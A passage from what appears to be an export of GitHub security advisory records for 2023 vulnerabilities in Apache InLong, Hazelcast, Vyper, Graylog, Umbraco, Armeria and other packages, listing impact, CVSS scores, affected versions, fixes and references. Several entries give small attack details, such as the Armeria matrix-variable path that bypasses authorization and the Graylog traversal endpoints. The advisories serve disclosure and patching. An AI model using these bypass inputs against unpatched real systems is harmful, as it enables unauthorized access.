'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-dao'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31062'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7836'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/btorjbo9o71h22tcvxzy076022hjdzq0'}]","{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:31:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-c5vj-wp4v-mmvx,2023-07-19T22:08:40Z,2023-07-19T22:08:40Z,,['CVE-2023-33265'],Hazelcast Executor Services don't check client permissions properly,"### Impact In Hazelcast Platform, 5.0 through 5.0.4, 5.1 through 5.1.6, and 5.2 through 5.2.3, and Hazelcast IMDG (all versions up to 4.2.z), Executor Services don't check client permissions properly, allowing authenticated users to execute tasks on members without the required permissions granted. ### Patches Fix versions: 5.3.0, 5.2.4, 5.1.7, 5.0.5 ### Workarounds Users are only affected when they already use executor services (i.e., an instance exists as a distributed data structure). ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.hazelcast:hazelcast-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.4'}}]","[{'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/security/advisories/GHSA-c5vj-wp4v-mmvx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33265'}, {'type': 'PACKAGE', 'url': 'https://github.com/hazelcast/hazelcast'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.0.5'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.1.7'}, {'type': 'WEB', 'url': 'https://github.com/hazelcast/hazelcast/releases/tag/v5.2.4'}, {'type': 'WEB', 'url': 'https://support.hazelcast.com/s/article/Security-Advisory-for-CVE-2023-33265'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:08:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-f5x6-7qgp-jhf3,2023-09-08T21:09:19Z,2023-07-25T17:46:19Z,,['CVE-2023-37902'],ecrecover can return undefined data if signature does not verify,"### Impact the ecrecover precompile does not fill the output buffer if the signature does not verify, see https://github.com/ethereum/go-ethereum/blob/b058cf454b3bdc7e770e2b3cec83a0bcb48f55ee/core/vm/contracts.go#L188. however, the ecrecover builtin will still return whatever is at memory location 0. this means that the if the compiler has been convinced to write to the 0 memory location with specially crafted data (generally, this can happen with a hashmap access or immutable read) just before the ecrecover, a signature check might pass on an invalid signature. A contract search was performed. Most uses of `ecrecover` are used for erc2612-style permit implementations, which typically look like: ```vyper assert _owner != empty(address) assert block.timestamp <= _deadline nonce: uint256 = self.nonces[_owner] digest: bytes32 = keccak256( concat( b""\x19\x01"", self.DOMAIN_SEPARATOR, keccak256(_abi_encode(PERMIT_TYPEHASH, _owner, _spender, _value, nonce, _deadline)) ) ) assert ecrecover(digest, convert(_v, uint256), convert(_r, uint256), convert(_s, uint256)) == _owner ``` in this case, the immutable `PERMIT_TYPEHASH` is loaded into `ecrecover`'s output buffer right before `ecrecover()`, and so the output of `ecrecover()` here when the signature is invalid will be the value of `PERMIT_TYPEHASH`. in this case, since `PERMIT_TYPEHASH` is not a valid address, it will never compare `==` to `_owner`, and so the behaviour is exactly the same as if `ecrecover()` returned 0 in this case. in general, a contract could have unexpected behavior (i.e. mistakenly pass this style of signature check) if an immutable representing a real address (ex. `OWNER`) was read right before the `ecrecover` operation. ### Patches v0.3.10 (with 019a37ab98ff53f04fecfadf602b6cd5ac748f7f and #3586) ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-f5x6-7qgp-jhf3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37902'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/commit/019a37ab98ff53f04fecfadf602b6cd5ac748f7f'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-133.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-252'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T17:46:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-2q4p-f6gf-mqr5,2023-08-31T18:52:56Z,2023-07-06T20:53:15Z,,['CVE-2023-41044'],Graylog server has partial path traversal vulnerability in Support Bundle feature,"A partial path traversal vulnerability exists in Graylog's [Support Bundle](https://go2docs.graylog.org/5-1/making_sense_of_your_log_data/cluster_support_bundle.htm) feature. The vulnerability is caused by incorrect user input validation in an HTTP API resource. Thanks to weiweiwei9811 for reporting this vulnerability and providing detailed information. ### Impact Graylog's Support Bundle feature allows an attacker with valid Admin role credentials to download or delete files in sibling directories of the support bundle directory. The default `data_dir` in operating system packages (DEB, RPM) is set to `/var/lib/graylog-server`. The data directory for the Support Bundle feature is always `/support-bundle`. Due to the partial path traversal vulnerability, an attacker with valid Admin role credentials can read or delete files in directories that start with a `/var/lib/graylog-server/support-bundle` directory name. The vulnerability would allow the download or deletion of files in the following example directories. - `/var/lib/graylog-server/support-bundle-test` - `/var/lib/graylog-server/support-bundlesdirectory` For the [Graylog](https://hub.docker.com/r/graylog/graylog) and [Graylog Enterprise](https://hub.docker.com/r/graylog/graylog-enterprise) Docker images, the `data_dir` is set to `/usr/share/graylog/data` by default. ### Patches The vulnerability is fixed in Graylog version 5.1.3 and later. ### Workarounds Block all HTTP requests to the following HTTP API endpoints by using a reverse proxy server in front of Graylog. - `GET /api/system/debug/support/bundle/download/{filename}` - `DELETE /api/system/debug/support/bundle/{filename}` ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.graylog2:graylog2-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-2q4p-f6gf-mqr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41044'}, {'type': 'WEB', 'url': 'https://github.com/Graylog2/graylog2-server/commit/02b8792e6f4b829f0c1d87fcbf2d58b73458b938'}, {'type': 'PACKAGE', 'url': 'https://github.com/Graylog2/graylog2-server'}, {'type': 'WEB', 'url': 'https://go2docs.graylog.org/5-1/making_sense_of_your_log_data/cluster_support_bundle.htm'}]","{'cwe_ids': ['CWE-22'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T20:53:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-2xvx-368h-qcmv,2023-07-31T22:02:15Z,2023-07-31T03:30:23Z,,['CVE-2023-4006'],phpMyFAQ Improper Neutralization of Formula Elements in a CSV File vulnerability,Improper Neutralization of Formula Elements in a CSV File in GitHub repository thorsten/phpmyfaq prior to 3.1.16.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4006'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/03946eca488724251eaed8d9d36fed92e6d8fd22'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/36149a42-cbd5-445e-a371-e351c899b189'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:02:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-7xr2-8ff7-6fjq,2023-07-14T21:59:13Z,2023-07-14T21:59:13Z,,['CVE-2023-37473'],zenstruck/collection passing callable string to EntityRepository::find() and query(),"### Impact Passing _callable strings_ (ie `system`) caused the function to be executed. ### Patches Fixed in [v0.2.1](https://github.com/zenstruck/collection/releases/tag/v0.2.1). ### Workarounds Do not allow passing user strings to `EntityRepository::find()` or `query()`. ### References [Fix commit](https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c). ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'zenstruck/collection'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/security/advisories/GHSA-7xr2-8ff7-6fjq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37473'}, {'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/commit/f4b1c488206e1b1581b06fcd331686846f13f19c'}, {'type': 'PACKAGE', 'url': 'https://github.com/zenstruck/collection'}, {'type': 'WEB', 'url': 'https://github.com/zenstruck/collection/releases/tag/v0.2.1'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:59:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-h8wc-r4jh-mg7m,2023-07-13T17:02:07Z,2023-07-13T17:02:07Z,,['CVE-2023-37267'],Umbraco allows possible Admin-level access to backoffice without Auth under rare conditions,"Under rare conditions, a restart of Umbraco can allow unauthorized users to gain admin-level permissions. ### Impact An unauthorized user gaining admin-level access and permissions to the backoffice. ### Patches 10.6.1, 11.4.2, 12.0.1 ### Workarounds * Enabling the [Unattended Install](https://docs.umbraco.com/umbraco-cms/reference/configuration/unattendedsettings) feature will mean the vulnerability is not exploitable. * Enabling IP restrictions to `*/install/*` and `*/umbraco/*` will limit the exposure to allowed IP addresses. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '10.6.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Infrastructure'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.0.1'}]}], 'versions': ['12.0.0']}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '10.6.1'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.4.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Umbraco.Cms.Web.BackOffice'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.0.0'}, {'fixed': '12.0.1'}]}], 'versions': ['12.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-h8wc-r4jh-mg7m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37267'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/1f26f2c6f3428833892cde5c6d8441fb041e410e'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/20a4e475c8d7b91d263e4e103ef19f3644e7b569'}, {'type': 'WEB', 'url': 'https://github.com/umbraco/Umbraco-CMS/commit/82eae48d098b9deecbdf86cf288b2b18020e1fed'}, {'type': 'PACKAGE', 'url': 'https://github.com/umbraco/Umbraco-CMS'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T17:02:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-fj8f-56wc-q36r,2023-07-28T21:37:28Z,2023-07-17T09:30:23Z,,['CVE-2023-26512'],rabbitmq-connector plugin module in Apache EventMesh platforms allows attackers to send controlled message,"CWE-502 Deserialization of Untrusted Data at the rabbitmq-connector plugin module in Apache EventMesh (incubating) V1.7.0\V1.8.0 on windows\linux\mac os e.g. platforms allows attackers to send controlled message and remote code execute via rabbitmq messages. Users can use the code under the master branch in project repo to fix this issue, the new version is set to be released as soon as possible.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.eventmesh:eventmesh-connector-rabbitmq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'last_affected': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26512'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zb1d62wh8o8pvntrnx4t1hj8vz0pm39p'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T21:37:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-f28g-86hc-823q,2023-07-13T19:56:19Z,2023-07-13T19:56:19Z,,[],Tokenizer vulnerable to client brute-force of token secrets,"### Impact Authorized clients, having an `inject_processor` secret, could brute-force the secret token value by abusing the `fmt` parameter to the `Proxy-Tokenizer` header. ### Patches This was fixed in https://github.com/superfly/tokenizer/pull/8 and further mitigated in https://github.com/superfly/tokenizer/pull/9.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/superfly/tokenizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/security/advisories/GHSA-f28g-86hc-823q'}, {'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/superfly/tokenizer/pull/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/superfly/tokenizer'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T19:56:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-f475-jgg3-3jwc,2023-07-06T23:40:45Z,2023-07-06T21:14:59Z,,['CVE-2023-31206'],Apache InLong Exposure of Resource to Wrong Sphere vulnerability,Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong from 1.4.0 through 1.6.0. Attackers can change the immutable name and type of nodes of InLong. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7891 to solve it.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-pojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-dao'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-test'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31206'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7891'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/qb7zffo785wzpmsobjqcypodngw6kg6x'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:40:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-jq43-q8mx-r7mq,2023-07-14T21:58:43Z,2023-07-14T21:58:43Z,,['CVE-2022-23465'],SwiftTerm Code Injection vulnerability,"### Impact Attacker could modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands. ### Credit These bugs were found and disclosed by David Leadbeater (@dgl at Github.com) ### Patches Fixed in version ce596e0dc8cdb288bc7ed5c6a59011ee3a8dc171 ### Workarounds There are no workarounds available ### References Similar exploits to this existed in the past, for terminal emulators: https://nvd.nist.gov/vuln/detail/CVE-2003-0063 https://nvd.nist.gov/vuln/detail/CVE-2008-2383 Additional background and information is also available: https://marc.info/?l=bugtraq&m=104612710031920&w=2 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/migueldeicaza/SwiftTerm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/migueldeicaza/SwiftTerm/security/advisories/GHSA-jq43-q8mx-r7mq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23465'}, {'type': 'WEB', 'url': 'https://github.com/migueldeicaza/SwiftTerm/commit/a94e6b24d24ce9680ad79884992e1dff8e150a31'}, {'type': 'PACKAGE', 'url': 'https://github.com/migueldeicaza/SwiftTerm'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:58:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-8rjh-3mhm-966q,2023-07-06T23:38:09Z,2023-07-06T21:14:59Z,,['CVE-2023-31453'],Apache InLong Incorrect Permission Assignment for Critical Resource Vulnerability,"Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can delete others' subscriptions, even if they are not the owner of the deleted subscription. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7949 to solve it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31453'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7949'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/9nz8o2skgc5230w276h4w92j0zstnl06'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:38:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-wvp2-9ppw-337j,2023-07-25T18:24:39Z,2023-07-25T18:24:39Z,,['CVE-2023-38493'],Paths contain matrix variables bypass decorators,"### Impact Spring supports [Matrix variables](https://docs.spring.io/spring-framework/reference/web/webmvc/mvc-controller/ann-methods/matrix-variables.html). When Spring integration is used, Armeria calls Spring controllers via `TomcatService` or `JettyService` with the path that may contain matrix variables. In this situation, the Armeria decorators might not invoked because of the matrix variables. Let's see the following example: ``` // Spring controller @GetMapping(""/important/resources"") public String important() {...} // Armeria decorator ServerBuilder sb = ... sb.decoratorUnder(""/important/"", authService); ``` If an attacker sends a request with `/important;a=b/resources`, the request would bypass the authrorizer ### Patches - https://github.com/line/armeria-ghsa-wvp2-9ppw-337j/commit/9b0ec3e099cc05fbff11d7f1012a1dddb0000d0c ### Workarounds Users can add decorators using regex. `e.g. ""regex:^/important.*""` ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.linecorp.armeria:armeria'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.24.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/line/armeria/security/advisories/GHSA-wvp2-9ppw-337j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38493'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/039db50bbfc88014ea8737fd1e1ddd6fd3fc4f07'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/49e04ef231ad65750739529c7fa4ce946ff7588b'}, {'type': 'WEB', 'url': 'https://docs.spring.io/spring-framework/reference/web/webmvc/mvc-controller/ann-methods/matrix-variables.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/line/armeria'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T18:24:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-5jc5-m87x-88fj,2023-08-01T21:39:57Z,2023-07-26T15:30:57Z,,['CVE-2023-39155'],Secret displayed without masking by Chef Identity Plugin ,"Chef Identity Plugin stores the user.pem key in its global configuration file `io.chef.jenkins.ChefIdentityBuildWrapper.xml` on the Jenkins controller as part of its configuration. While this key is stored encrypted on disk, in Chef Identity Plugin 2.0.3 and earlier the global configuration form does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:chef-identity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39155'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3192'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/26/2'}]","{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:37:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-vc79-65pr-q82v,2023-07-27T16:11:53Z,2023-07-15T00:30:34Z,,['CVE-2023-38337'],rswag vulnerable to arbitrary JSON and YAML file read via directory traversal,"rswag before 2.10.1 allows remote attackers to read arbitrary JSON and YAML files via directory traversal, because rswag-api can expose a file that is not the OpenAPI (or Swagger) specification file of a project.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'rswag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38337'}, {'type': 'WEB', 'url': 'https://github.com/rswag/rswag/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rswag/rswag'}, {'type': 'WEB', 'url': 'https://github.com/rswag/rswag/compare/2.9.0...2.10.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rswag/CVE-2023-38337.yml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:44:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-4r8x-2p26-976p,2023-08-01T15:37:19Z,2023-07-18T21:30:37Z,,['CVE-2023-37788'],goproxy Denial of Service vulnerability,goproxy prior to pseudoversion 0.0.0-20230731152917-f99041a5c027 was discovered to contain an issue which can lead to a Denial of service (DoS) via unspecified vectors.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/elazarl/goproxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20230731152917-f99041a5c027'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37788'}, {'type': 'WEB', 'url': 'https://github.com/elazarl/goproxy/issues/502'}, {'type': 'WEB', 'url': 'https://github.com/elazarl/goproxy/pull/507'}, {'type': 'PACKAGE', 'url': 'https://github.com/elazarl/goproxy'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:11:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-7gj7-224w-vpr3,2023-07-27T16:27:15Z,2023-07-14T06:31:00Z,,['CVE-2023-38286'],"Thymeleaf, as used in Spring Boot Admin, allows sandbox bypass via crafted HTML","Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI. Spring Boot Admin 3.1.2 contains a 